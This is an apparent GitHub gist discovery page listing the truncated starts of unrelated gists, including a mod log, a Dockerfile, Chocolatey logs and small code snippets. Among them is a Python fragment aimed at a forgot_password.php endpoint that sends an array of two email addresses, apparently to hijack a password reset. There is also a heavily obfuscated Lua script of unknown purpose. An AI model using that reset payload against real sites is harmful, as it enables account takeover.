Discover gists
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"expiration": "2025-07-10 14:13:59" | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Log uploaded on Wednesday, July 9, 2025, 9:16:53 AM | |
Loaded mods: | |
Harmony(brrainz.harmony)[mv:2.3.4.0]: 0Harmony(2.3.3), HarmonyMod(2.3.1) | |
Core(Ludeon.RimWorld): (no assemblies) | |
[NL] Facial Animation - WIP(Nals.FacialAnimation): FacialAnimation(1.0.0) | |
[SR]Factional War Continued(SR.ModRimworld.FactionalWarContinued): ModRimWorldFactionalWar(1.0.0) | |
Blueprints(Fluffy.Blueprints)[mv:2.17.133]: 0Harmony(av:2.3.3,fv:2.3.1.1), BetterKeybinding(av:4.0.0,fv:4.0.53), Blueprints(av:4.0.0,fv:4.0.53) | |
Multiplayer(rwmt.Multiplayer): 0MultiplayerAPI(av:0.5.0,fv:0.5.0), 0PrepatcherAPI(1.2.0), LiteNetLib(1.0.0), MultiplayerLoader(1.0.0), RestSharp(av:106.12.0,fv:106.12.0), System.IO.Compression(av:4.1.2,fv:4.6.24705.1), Multiplayer(0.10.5 [no FileVersionInfo]), MultiplayerCommon(1.0.0 [no FileVersionInfo]) | |
Vanilla Expanded Framework(OskarPotocki.VanillaFactionsExpanded.Core): 0ModSettingsFramework(1.0.0), 0MultiplayerAPI(av:0.5.0,fv:0.3.0), 0PrepatcherAPI(av:1.2.0,fv:1.1.1), ExplosiveTrailsEffect(1.0.7140.31563), GraphicCustom |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// URL encoding with encodeURIComponent | |
const objectToQueryString = function (obj) { | |
return Object.entries(obj) | |
.map(([key, value]) => `${encodeURIComponent(key)}=${encodeURIComponent(value)}`) | |
.join('&') | |
} | |
const input = { | |
routes: [ | |
{ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM python:3.10-slim | |
WORKDIR /app | |
COPY requirements.txt . | |
COPY app/ . | |
RUN pip install --no-cache-dir -r requirements.txt | |
CMD ["uvicorn", "main:app", "--host", "0.0.0.0", "--port", "8000"] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<fileSnapshot xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> | |
<files> | |
<file path="C:\ProgramData\chocolatey\lib\typescript.vs\typescript.vs.nupkg" checksum="A38CE72CC35DE35C4BF73A8B3F8DCFBD" /> | |
<file path="C:\ProgramData\chocolatey\lib\typescript.vs\typescript.vs.nuspec" checksum="7B84700342E8313143CE994F125B46CC" /> | |
<file path="C:\ProgramData\chocolatey\lib\typescript.vs\tools\chocolateyInstall.ps1" checksum="A56A7CD19A5AAE181E475C3414159C3F" /> | |
</files> | |
</fileSnapshot> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
TARGET = "https://?/forgot_password.php" | |
EMAIL1 = "" | |
EMAIL2 = "" | |
payload = { | |
'email[]': [EMAIL1, EMAIL2], | |
'submit': 'Reset Password' | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
--[[ v1.0.0 https://wearedevs.net/obfuscator ]] return(function(...)local p={"\057\072\099\079";"\080\119\066\070\049\097\097\099\080\057\122\106\080\117\104\073";"\104\086\061\061","\116\116\067\078\122\112\078\073\079\055\061\061";"\112\074\101\114\072\114\086\103\121\086\056\049\087\103\051\087\111\080\067\084\112\089\051\115\116\116\061\061";"\070\097\069\086\098\050\085\118\105\072\054\061","\121\104\089\052";"\049\078\107\072\049\108\099\076\048\086\061\061","\113\115\107\066\101\069\099\087\109\089\115\081\069\119\067\111","\055\084\086\098\068\088\082\056\065\121\108\085\112\105\100\121\065\052\050\103\068\079\071\085\107\117\075\065\065\073\118\121","\051\079\116\110\053\043\097\115\108\088\116\107\079\111\069\052\103\110\050\105\080\065\117\101\089\055\069\074\115\054\066\071\076\117\113\122","\079\066\122\048\051\119\106\070\067\049\110\103\098\077\120\104\052\076\085\102\075\108\104\099\047\086\106\070\097\075\061\061","\067\067\053\089\066\052\106\111\090\105\050\073\122\107\104\086\100\052\054\0 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* Wait on a slow download page for Anna's archive and auto * click the Download button once it is ready | |
*/ | |
function checkAndClickDownloadButton() { | |
const intervalMs = 1000; | |
let clicked = false; | |
let intervalId; | |
function check() { | |
const btns = Array.from(document.getElementsByTagName("a")).filter( | |
(ele) => ele.innerText === "Download now" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
namespace Dynamic_array | |
{ | |
internal class Program | |
{ | |
static void Main(string[] args) | |
{ | |
int[] numbers = new int[1]; | |
int[] tempNumbers = new int[0]; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
2025-07-09 06:11:57,235 4892 [DEBUG] - XmlConfiguration is now operational | |
2025-07-09 06:11:57,470 4892 [DEBUG] - Adding new type 'CygwinService' for type 'IAlternativeSourceRunner' from assembly 'choco' | |
2025-07-09 06:11:57,486 4892 [DEBUG] - Adding new type 'CygwinService' for type 'IInstallSourceRunner' from assembly 'choco' | |
2025-07-09 06:11:57,486 4892 [DEBUG] - Adding new type 'PythonService' for type 'IAlternativeSourceRunner' from assembly 'choco' | |
2025-07-09 06:11:57,503 4892 [DEBUG] - Adding new type 'PythonService' for type 'IListSourceRunner' from assembly 'choco' | |
2025-07-09 06:11:57,517 4892 [DEBUG] - Adding new type 'PythonService' for type 'IInstallSourceRunner' from assembly 'choco' | |
2025-07-09 06:11:57,517 4892 [DEBUG] - Adding new type 'PythonService' for type 'IUninstallSourceRunner' from assembly 'choco' | |
2025-07-09 06:11:57,531 4892 [DEBUG] - Adding new type 'RubyGemsService' for type 'IAlternativeSourceRunner' from assembly 'choco' | |
2025-07-09 06:11:57,531 4892 [DEBUG] - Adding new typ |
NewerOlder